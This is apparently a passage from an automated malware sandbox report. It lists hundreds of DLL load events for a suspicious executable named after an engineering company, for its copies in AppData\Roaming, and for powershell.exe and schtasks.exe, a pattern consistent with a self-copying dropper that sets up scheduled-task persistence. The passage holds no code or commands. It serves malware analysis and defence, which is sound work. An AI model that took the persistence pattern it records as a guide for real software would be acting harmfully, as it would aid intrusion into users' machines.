               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
               Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
               Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
               Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: mscoree.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: kernel.appcore.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: version.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: vcruntime140_clr0400.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: ucrtbase_clr0400.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: ucrtbase_clr0400.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: uxtheme.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: sspicli.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: cryptsp.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: rsaenh.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: cryptbase.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: windows.storage.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: wldp.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: propsys.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: profapi.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: edputil.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: urlmon.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: iertutil.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: srvcli.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: netutils.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: windows.staterepositoryps.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: wintypes.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: appresolver.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: bcp47langs.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: slc.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: userenv.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: sppc.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: onecorecommonproxystub.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: onecoreuapcommonproxystub.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: sxs.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: mpr.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: scrrun.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: linkinfo.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: ntshrui.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: cscapi.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: mswsock.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: dnsapi.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: iphlpapi.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: rasadhlp.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: fwpuclnt.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: wbemcomn.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: amsi.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: avicap32.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: msvfw32.dll
               Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Section loaded: winmm.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: mscoree.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: apphelp.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: kernel.appcore.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: version.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: vcruntime140_clr0400.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: ucrtbase_clr0400.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: uxtheme.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: windows.storage.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: wldp.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: profapi.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: cryptsp.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: rsaenh.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: cryptbase.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: dwrite.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: textshaping.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: windowscodecs.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: amsi.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: userenv.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: msasn1.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: gpapi.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: propsys.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: edputil.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: urlmon.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: iertutil.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: srvcli.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: netutils.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: windows.staterepositoryps.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: sspicli.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: wintypes.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: appresolver.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: bcp47langs.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: slc.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: sppc.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: onecorecommonproxystub.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: onecoreuapcommonproxystub.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
               Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
               Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
               Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: mscoree.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: kernel.appcore.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: version.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: vcruntime140_clr0400.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: ucrtbase_clr0400.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: ucrtbase_clr0400.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: uxtheme.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: sspicli.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: cryptsp.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: rsaenh.dll
               Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Section loaded: cryptbase.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: dwrite.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: textshaping.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: windowscodecs.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: amsi.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: msasn1.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: gpapi.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: edputil.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: appresolver.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: bcp47langs.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: slc.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: sppc.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: dwrite.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: textshaping.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: windowscodecs.dll
